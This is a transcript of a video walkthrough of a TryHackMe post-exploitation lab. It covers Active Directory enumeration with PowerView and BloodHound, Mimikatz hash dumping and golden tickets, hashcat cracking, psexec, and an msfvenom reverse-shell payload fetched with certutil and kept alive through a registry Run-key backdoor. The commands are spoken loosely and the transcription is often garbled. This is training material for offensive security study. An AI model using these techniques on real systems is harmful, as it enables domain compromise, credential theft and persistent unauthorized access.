Welcome back. In today's video, we're going to talk about post-exploitation and enumeration. So basically, it is post-exploitation basics from TryHackMe. And as you can see, I have access to the browser, but we're going to do things from our Kali machine. It is better. So basically, we're going to talk about enumeration using PowerView, which is a script, PowerShell script from PowerShell Empire. And here Bloodhound for enumeration as well. So as you can see, PowerView and Bloodhound for enumeration. Mimikatz, dumping passwords, hashes, golden tickets, post-exploitation, enumerating service manager, server managers, and maintaining access. So you can say that this walkthrough is all about enumeration and post-exploitation. Of course, we're going to do a bonus on this video. We're going to explore PowerShell Empire as a post-exploitation tool, in addition to the tools we have seen here. So basically, PowerView is an option for enumeration. Bloodhound is an option also for enumeration. Of course, the purpose of using PowerView and Bloodhound is to escalate your privileges, to be an administrator. The same as with Mimikatz, your purpose if you are dumping hashes or golden tickets with Mimikatz, your purpose is to become an administrator on a domain controller or on other domain joined machines. So the purpose of all of that is to become an administrator or elevate your privilege using post-exploitation tactics. Maintaining access is all about having a way to access the machine back in case it was shut down or logged out, or in case you want to do it later. Okay, so let's get started. So first, as you can see, there are instructions on how to do that. Basically, here we have the username and password that's needed to log into the machine. So this scenario assumes that we already have exploited a target. Okay, and our next step now is to do post-exploitation and elevation of privilege. So basically, I'm going to take the username as administrator, and the password is password123 at domain controller.local. I'm going to only copy the password here. I'm going to go back, and here we're going to have two channels. So basically, I'm going to create a new tab, split, right. So one here and one here. So here, you're going to type sudo or desktop -u administrator. And of course, we need to add the host file. So we're going to type sudo and nano etc hosts. So all the way down, here we add the machine IP 10.10.249.0. Here controller local, which is the DNS name. So basically here I type administrator controller local. Oh, I messed this up. Okay. Yes, accept the cert. Now the password, we're gonna paste the password. No? Okay. Password 123 at login. Wrong. Okay. Still incorrect. Administrator. How come? Is it the space? Let's copy the space. Password 123. Wow. The password is incorrect. I'm gonna try one more time. Okay, controller local password. Okay, I don't know why it's popped up wrong the domain name. So I'm gonna cancel this. So the first scenario, you have RDP access. Okay, somehow you have managed to enable RDP on the machine and access it using remote desktop. So basically it's saying here access command prompt cmd, and of course this is assuming that you have administrator access. Okay, so here we are administrator. I know it's kind of doesn't make sense. You are using post exploitation and enumeration elevation of privilege, and you are already administrator, right? So this is just for demonstration and practice. So here we type PowerShell -ep bypass. This one to bypass the execution policy, the PowerShell script execution policy. So right now here we started PowerShell. On the other side, we can also have an SSH access. Sudo SSH administrator at controller local. Controller. Yes. Okay. Password. Let's take the password. Right now we have SSH access. Who am I? Administrator. Fine. So now we get started. The first thing, suppose that, as I said, we have accessed a target and we want to enumerate for all of the existing users, groups, relationships, the trusts, so we can harvest and make use of all of these info to do privilege escalation. Of course, we're not going to do privilege escalation on this machine since we are already administrators, but that's the purpose of the practice here. So, right, so here we go back and PowerView has already been imported into the target. Suppose that you have downloaded it yourself. So we go to desktop or downloads, ls. We have PowerView.ps1. Of course, PowerView is a part of PowerShell Empire used for enumeration. So basically here, if we go to Google, open up Google. And here, it is nice to have the commands PowerView.ps1 ready for us to, take a look at them. We're not going to be able to memorize all commands, right? So PowerView, and here Powersploit. So here are the commands. Okay, every command has its description. You can open up the cheat sheet here, okay, and then you can see whatever fits your purpose. So basically, for example, as the scenario in TryHackMe is saying, try to find the users. So we type get net user pipe select cn. Oh, we have to start this before. Okay. So we start this like that. All right, now the next thing is we type again get user select after we run the script. We're still getting this term get net user is not recognized. If I go back here and type all right, then get net user select cn. Okay, here you can see we have the users, administrator, guest. This is the identifier for the Kerberos tickets, machine 1, admin 2, etc. So we have enumerate the domain groups, get net group, dash group name, admin. So it's trying to find what are the groups where the word admin is mentioned, as you can see. So we try to find this. So get net group. So basically here are the groups where the administrators are parts of. Administrators, Hyper-V, storage replica administrators, etc. So as you can see, we are here finding info about the Active Directory hierarchy, the users, the groups. Most of the time, our end goal is to find what are the groups that the domain admin is part of. Okay, so basically here, the domain admin, if we go back to, I guess, what was the cndlet? Get domain group admin. Okay, here are the users. So sometimes administrator is part of domain admins and other groups. Okay, so we want to find these groups. We want to find what are the groups that the administrator is part of. And there might be sometimes that there is another administrator beside the main one. So basically, as you can see, we have admin 2. We're also interested to find what are the groups the admin 2 belongs to. Okay, so later down the road, we can create our own users and add it to one of the groups beside the admin. So let's go back and see how we can find this an acceptable command to this version. So basically here there is one. So if we enumerate the local groups, this one enumerate the groups, and this one enumerate members of specific local group on the local machine. That's what we want. So this one here, enumerate net local group member, and we specify the member. So let's first invoke the command or copy paste it. I hope it's gonna work. Copy paste here, doesn't work. Or we can try the SSH session, way easier for copy paste. So basically here we type, let's go back first. So on the SSH session here, it's way more convenient for copy paste actually. So paste. PowerShell -ep by launch the tool, and then here let's go back to the browser. Where is the browser? Okay, so get net local group member. Let's say it is administrator, and again we get this. Wow, that's very okay. Let's try this one. We try like that, dash member identity, and here we type administrator. Okay, let me cancel these. Get domain group isn't recognized as the name of CM direct. Okay, so it seems like I don't know what's wrong with the tool being imported on the remote host. Let's stick with the steps here. So here, the next it's asking what is the shared folder that is not set by default. So it's like asking what is the shared folders on the system here. So to find the shared folders, all we have to do is to type invoke share finder. So basically we have remote admin, default share, IPC, logon server, and logon share server. And the question is, what is the shared folder that is not set by default? So for me, it's the one that stands out is this one, share. So if we type share here, so the answer is correct. Why share is the shared folder that's not set by default. As you can see, there is no description here, and all of the rest self-explanatory. All of them are default, right? Except this one. The name indicates itself. The next question is, what is the operating system running inside of the network besides Windows Server 2019? So here's the question. What is the operating system running inside of the network besides Windows Server 2019? So as it's indicating, there is another operating system running. So to do that, all you have to do is to type get net computer. So basically we have domain controller, desktop 2, and desktop 1. So what we have to do here is to find the operating system on every single one, right? We have 1, 2, 3. The main one is Windows Server 2019. Now we want to know what is the operating system running on the rest or the remaining 2. So what we have to do here, getnet computer dash full data, and here we type pipe to select operating system. So we have to Windows Server 2019, Windows 10 Enterprise Evaluation, Windows 10 Enterprise Evaluation. So here we type Windows 10 Enterprise Evaluation. Okay, I have hidden a flag inside of the user's find it. So there is a flag inside users. Let's find it. How can we find this? We don't have to navigate through the file system. All we have to do is to use get net user. So displays all info about the current user, which is the administrator. So basically, let's find out all of the, how many stuff here we have. Seems like all of the users, logout account, description. This is the administrator account. And this is another user, I guess. What was the question? I don't understand the question actually. I have hidden a flag inside of the users. Find it. Okay, sir, let's find it. My password is my password 123. This is for which user? Okay, if we type get net user post, this is for the current user. That's what I'm looking for the administrator. Top person post. I type this. So the CN is administrator here. Okay, for the user post, so the next question is, I have hidden a flag inside of the users. Find it. So there is a flag inside of users, but actually the sentence is vague, right? It doesn't specify whether it's inside of a user's directory or inside of users by the meaning of enumerating the users. The correct explanation of this sentence is by enumerating all of the users, you will find the flag. So basically here, what we have to do is to go back and enumerate the users and find which user we need to enumerate. So we type get net user, I don't know, why it's typing 0. Okay, net user, and now we type select administrator guest machine 1 admin 2 post. This one is interesting. So to find out the info about specific user, all we have to type is get, or the same command here, and we type the name of the user. In this case, it is post, and you can see the flag is this one. So let's find the formula. So the formula is having, oh, what's that? Sometimes weird things happening on my laptop. Okay, take this like that, and we copy that, submit, and now it is correct. So that was the purpose of using PowerView. So PowerView is all about enumeration. You find everything about the domain, and there are more commands than you can imagine in PowerView. All you have to do is to go back here and look at these, but some of them didn't work. There is a web page, or there is a link. Let me grab the link. This link, you can find this link also in the explanation of TryHackMe. So these are the commands and as you can see, the explanation. For example, get domain group dash member identity, get all the groups a user is effectively a member of, which is very effective. You need to know that. Use an alternate credential for any function, retrieve all computer DNS host names. So it's all about enumeration, right? You enumerate till you find a piece of data or a piece of info that you may use it to elevate your privilege. Most of the time it is pointing or pinning down the target user that you want to find the password hash to. In this case, we know that the administrator user, and we know that we need to find the admin2 hash. Okay. So now the next step here is to use, let's go up, enumerate with Bloodhound. So basically Bloodhound is two tools. The Bloodhound, you install Bloodhound on your local system, and SharpHound, you import SharpHound into the target. SharpHound will collect the information and store them in a zip file. The zip file will import the zip file to Bloodhound on your local machine to explore the results. So once we are logged in, okay, we can click on this button, which is for importing data, importing graph, and basically we specify the file, okay, which we will take from the remote host. This file will contain all of the data, okay. So click on X, and we will head back to the target. So the target is somewhere. So this is SSH and the RDP is here. Okay. Now we will run the sharp hound, okay, and get everything ready. So basically here we're gonna type, let me copy that first. Oh, okay, doesn't want to copy. So we run sharp hound here, okay, and then we type invoke Bloodhound. Dash collection method all dash domain. The domain name is controller.local, controller. And we export everything to a zip file, dash z zip file name. It's going to be, according to TryHackMe, the name was loot, so let's name it loot.zip. So the file has been exported to administrator loot.zip, which is the number here. So we navigate there, or directory. We see you have the loot file. All we have to do here is to transfer it. We have to transfer one file to our machine, which is the loot.zip. To do that, all you have to do is to run this command. Using scp, right, we transfer the file from the remote host to our local machine on this directory. I have already done this, so go and do it on your own. This is the file. The next thing is we do it, import it with Bloodhound. So all you have to do is to go to import to graph, click on that, and specify the file. In my case, it didn't work from this interface. I had to just drag this here and drop it. So then you go to click on this menu and you have queries. In the queries, you have all of predetermined, pre-built queries, pre-compiled queries to enumerate the Active Directory in a graphical and a visual way. So for example, to find all admins, we can click on find all admins and we can see the domain admins. So the domain admins are, make this bigger, we have SQL service and we have admin2, administrator. Okay, so we have three admins. One of them is the service account, which is the answer to one question on TryHackMe, which is something vulnerable. Don't have any service account as administrator. Now the next one is to find list all keeper-stable accounts. What do you mean by keeper-stable accounts? Are the accounts whose ticket, the granting ticket, can be harvested using keeproot and cracked offline. To fix this, we have to specify the pre-authentication to be enabled on these two accounts. So that was for Bloodhound. Of course, we can go over all of the queries and enumerate them. Find computers with unsupported operating systems. Find keeper-stable members of high-value groups. So that is the member who is keeper-stable and high-value. Keeper-stable, as we can see from list keeper-stable accounts, and high-value, why? Because it is an admin, and it is part of administrators, enterprise admins, domain admins. Okay, that was for Bloodhound. Now the next thing is we go to Mimikatz. So basically with Mimikatz, here, so Mimikatz, let me make this bigger. So Mimikatz, as you all know, we can run Mimikatz with this command, okay? And first we have to check the privilege, since Mimikatz requires administrative privilege to be run. If we get okay, it means we have privilege. To dump the hashes, we have to type lsa dump lsa/patch, and we have the hashes. Now, what's required from TryHackMe is to find the password for an account named machine 1 and machine 2. So machine 1, this is the hash of machine 1, and this is the hash of machine 2. Now, let's copy this and try to submit this here. Machine 2 hash submit, that's correct. Now we have to find the machine 1 password. To find this, we have to use John the Ripper or hashcat. So we can go back. Okay, so here we type sudo, or we have to copy the hash first. So machine 1 is this one. Okay, so sudo nano machine 1, paste the hash, save it, and now sudo hashcat -m 1000 characters, and we put the file name machine and the word list. The word list is user share word lists raw queue. Okay, and the alternative is to use John the Ripper. Okay, what else we can do with Mimikatz? We can impersonate the tickets, the golden ticket principle. We have done this before when I uploaded videos about Active Directory enumeration. I don't remember the video name, but there was one video where I did golden ticket impersonation to access other Active Directory computers. So we're gonna demonstrate that too here. So the password is cracked, and where's the password? Okay, we have to do this -- show. The password is password1. Take it, and we go back, paste, submit. Okay, that was Mimikatz. So this is for dumping the hashes. Now, golden tickets. So golden tickets is all about, instead of having the password, you impersonate the ticket of the user. If you are familiar about Kerberos, having the ticket of some user, you can impersonate and log in as the user or perform commands as the user. So how to do that? We need first to find the hash of the account connected to Kerberos, which is the Kerberos. The name of the account is the security identifier, or I don't know I don't remember. I don't recall the name, but this account starts with something like KRBTZT. Okay, so basically we're gonna dump the hash of this account to impersonate and find the golden tickets. So we do that from Mimikatz as well. So we type LSA dump LSA/inject name, and here we specify the account. We want to dump the hash of the security identifier of the Kerberos ticket granting ticket account, which is KRBTGT. So we type KRBTGT, and let's see what we have here. So we have the this identifier, which is the SID. It's going to be needed, and we have the account name, the identifier of the Kerberos ticket granting ticket account, and we have its hash. So to create or to find the golden ticket, the command is also specified. So we type Kerberos 2 times golden, and then we specify the user, which user I want to dump the ticket granted ticket. Let's say we are a non-administrative user, okay, something like machine 1, machine 2, and we want to dump ticket granted tickets. Okay, now since we have found the password of one user, which was password1, let's log in and simulate this behavior from a realistic scenario. Sudo evil win rm-i controller.local -u username was something like machine1, I remember. It was with big A, or I think it's big A, machine1-p. Let's log in as this user and perform golden ticket attack. Of course, this depends if machine1 can run Mimikatz. If it can't, we can't use this. Or we can't dump the golden ticket of the administrator, starting from machine1. And do work. Guess we can't even win RM, I guess. Let's try RDP instead. So sudo r desktop dash view machine 1. The host name will be controller. So another session now. Take this. And don't forget to replace this because controller lockup. The password is, you have it, password 1. Oh, no copy paste. I remembered. So password 1. To sign in remotely, you need to write to sign in through remote desktop services. By default, members of the administrators group have this right. Okay. Oh, we can't sign it. Okay. So machine1 is not a member of the remote desktop, right? That's why it can't sign in. So basically, if you go to Bloodhound and find workstations where domain users can RDP. Select domain users group. No data. Let's see, something has to do with RDP. RDP. I guess administrator is the only user. Let's find out from here. Let's go back to our old session. And from here, we click on, where was this? Nope. So here we have the users, groups. So RDP users, RDP. Where is the group? Let me check on machine1. Properties. Member of domain users. Let's check on admin1, admin2, member of administrators. Yes, so admin2 can do that. So basically, let's find the password of admin2 and log in as admin2 to perform the golden ticket from a realistic point of view. So basically, go back here and we find the hash of admin2. So admin2, the NTLM hash is this one. Take it and go back, sudo nano admin2, paste in the hash, and then run hashcat on admin2. Exhausted didn't work on admin2. So we can change its password, no problem. Okay. So admin2, properties, let's reset the password. put something simple like admin 2, admin 2, THM. So admin 2, admin 2, THM. I don't type a complex password since the complex password will be hard to remember or will be hard to, copy paste. So let me type THM at admin 2A. Okay, THM at admin 2A. What kind of password policy it has? Let me see here. A password that is not reset. Right. Oh God, come on. This is very draining. Sometimes it feels very shit to do this. 2, 3, 4, 2, F4, AB3, 0, 0, 2, 3, 4, 2, F4. Finally, okay. Now let's do that and log in as admin 2. So here, type here admin 2. Right. Here, what else? Okay, controller, local. The password, OPAT. Okay, so what we will do here, we will simulate a case where you have access to a machine and the user was not the original administrator of the domain controller. Admin 2 is an admin, I know that, but it is not the original admin. And we will create the golden tickets now, and after creating the golden tickets, we will be impersonating the original admin in this session. So here we type cmd Okay, now it's going to take ages to run. Christ. What do you mean there is no CMD on the system? I mean, that's ridiculous. If I type CMD again, it's not going to find it, or what? Run. Jesus Christ. Okay, so the command prompt here, I'm going to go back. Directory cd users, cd admin2, or cd administrator because Mimikatz is there. Access denied. Okay, we need the tool here actually. cd admin2. Alright, so we're not going to be able to do that. I'm going to cancel the session. Since the tool is not imported to admin2, so I'm going to stick with admin1. Okay, let's continue on with the golden ticket now. So we go back. Where was it? Okay. So after we run the module, we can see the SID and we can see the NTLM hash and the account. Now the rest is to run the command. Okay, so basically we go down and here we specify the user, okay, that will be or we will be impersonating. So in my case, I am the administrator here. Okay, I'm going to suppose that we want to impersonate admin2 on the system. Okay, so we type here admin2 and type domain, which is controller.local-sid. Now this ID, take it from here. Okay, and then we type /id. Let's go up. No, go down. So most probably the ID is the ID of the user actually we need. Right. If I go back here, so basically we need the ID of the admin2 user. So we go back and we type wmic user, not typing, user account, get name, SID. We get a list of all the users and their SIDs, and of course we get the IDs. So basically the ID here is this line. Administrator has the ID of 500, admin2 has the ID of 1105. So 1105, and give us the missing the argument. What? Missing key argument. So I have a missing argument here. Let's find out. User, domain, and the SID. Oh, and we forgot the account actually. So the account, the KR BTGT account. Okay, so basically the account, we take this from all the way up, which is the account hash. The account hash is this one. So take it and go down, paste it here. So now, as you can see, the ticket granted ticket has been, as you can see, final ticket saved to file. Now we can access the computer of admin2 or the desktop of admin2. Right, we are now the administrator. Let's access admin2. So we type miscellaneous cmd. Right, so what we have here, let's start do that. So basically what we can do here, we can type, oh, let me bring the backslash. Backslash, I don't have it on my keyboard. So for example, type like that, and then, or before that, we want to find the computers. What other computers we have. So basically we go down, type directory, and we're going to use again PowerView, right, to find the computers. So get net computer So say we want to access desktop 2, right? Let's go back. Okay, so from here, I'm going to be attempting to access the desktop 2 from here. Let's take the backslash first. Desktop 2 cmd.exe. So we have problem now. Oh, we forgot to type the tool actually. So basically here, after Mimikatz, we're going to exit Mimikatz, or from other prompts, from here, let's say, we're going to type psexec / desktop 2, right, and cmd.exe. psexec, we don't have it. So I'm going to move now psexec, both desktop, right. Again, we go back, type my IP, again, so my IP is like that. Look how easy is this IP to memorize. 10.9.132.252. Fine. And then we type 8000. The tool name is so PS. Now let's run psexec, and the computer name. Wait till they get the backslash. Say desktop 2. Yep. And then we type cmd.exe. It means that we want to access a command prompt on the computer desktop 2. Agree. Couldn't access desktop 2. The share is enabled. Well, this is weird. Let's try desktop 1. Well, let's try accessing some other share or some other command on that computer. So let's say directory, and here you go again, the backslash, wasting our time on backslashes. Okay, say C as proposed by TryHackMe. The network path couldn't be found. So I'm not sure if the granted ticket was successfully, or the golden tickets has been generated successfully. It's saying here, file ticket safe to file. Okay, let's do that. So if we type here for the admin account, and here we change the user. So now we generate golden ticket for the administrator, cmd.exe, and here we new command prompts. Okay, so here we try again. The network path couldn't be found. How many we have here? 3, I guess. So in this one, if I type who am I, administrator. If we try to access the C, oh, so for some reason, I'm not able to spawn cmd.exe on other computers. So I'm gonna skip this. Just have to type correct answer. And we're gonna go on with the rest of the, okay, so here you enumerate the service manager, the server manager, right? So you can see here all of the modules, the things you can do with the server. And here you can navigate to the Active Directory. We have already done this. Now the question is, what tool allows you to view the event logs? Clearly self-explanatory, it's Event Viewer. Now what is the SQL service password? If you remember, this account is a service account that is an admin. And to get the password, all we have to do is to go to Active Directory or from here. Okay, I don't want this. So basically here we type active and see a list of users. As you can see, the SQL service has its password in the description. So you click on properties. You're gonna find this in the real world, of course. That's for the sake of answering the questions. So the password is submit. Okay. Now what's next? Next is maintaining access. So here we have to use Metasploit. So first we generate, let's do that. So persistence is all about having or maintaining access to the machine. Okay, so one way to do that is to change the password of one of these users. So now we have access, we can change the password, or we have already got the password hashes for the users. We can keep them and log in whenever we want. Now the alternative is to use Metasploit to generate a payload, transfer it over, and run it, and then run the persistence module. So we can launch again the command line. I'm going to keep this up. So split the view. Okay. Sudo msf venom -p windows lhost equal 10. Yes, my IP, which is the hardest to memorize IP address. .9.132.252. And port equal 4545-F. Shell. Let's go back and do this from the command line. So this is the target now. Here we will download cert util-url cache-f. 252. So now it's being downloaded. Let's launch a listener now, MSF. Okay, now use exploits multi. Oh, no S. Oh, I just memorized my IP address. Okay. Yes, but I messed other things up. Set import. Okay. Set auto run script post Windows run. Handler failed to bind. Again, I fucked up my IP address. 9.132.252. Run. Okay, so here execute the payload. And we have received the interpreter session. Now for persistence, to maintain access, as I mentioned, guys, the password harvest is one way. The second way is we use a module from Metasploit called local persistence. So we say background use exploit Windows local show options. No payload configured. Defaulting to Windows interpreter. Okay, fine. So here we define the session. Set to 1. Right. And here you see the IP. Change this or keep it. If it is a public IP, keep it as change it to public IP. In my case, I'm going to change this to the actual IP I have, the VPN connection. And I hit run. So as you can see, the auto run now has been installed on this registry key. If we go now to our desktop access and we inspect the registry, so it's saying in Microsoft, the current user. So basically current user, where was this? Software Microsoft, okay. Software Microsoft, and then current version run. Windows. As you can see, guys, this is the backdoor. Modify. This is the Visual Basic script running on that's maintaining your access. Every time this computer runs, every time this computer boots up, this Visual Basic script will run and maintain your access. That's another way. Now, let me tell you about PowerShell Empire. Now for PowerShell Empire here, we're going to specify a separate video for this. I'm not going to do it this time. We're going to do this in a separate video to lay down all of the PowerShell Empire basics. Basically, it's a post-exploitation framework, as you all of you know. So oh, okay. ما اتلعثمت، ما قدرت احكي شيء. So that was it. For PowerShell Empire, we're going to be dedicating a separate video for PowerShell Empire with a practical scenario. We're going to go through all of the modules, all of the listeners, all of the stagers, post-exploitation tactics, stealth tactics in the upcoming videos. So stay tuned. I hope you find this video enjoyable, and we see you in the next video.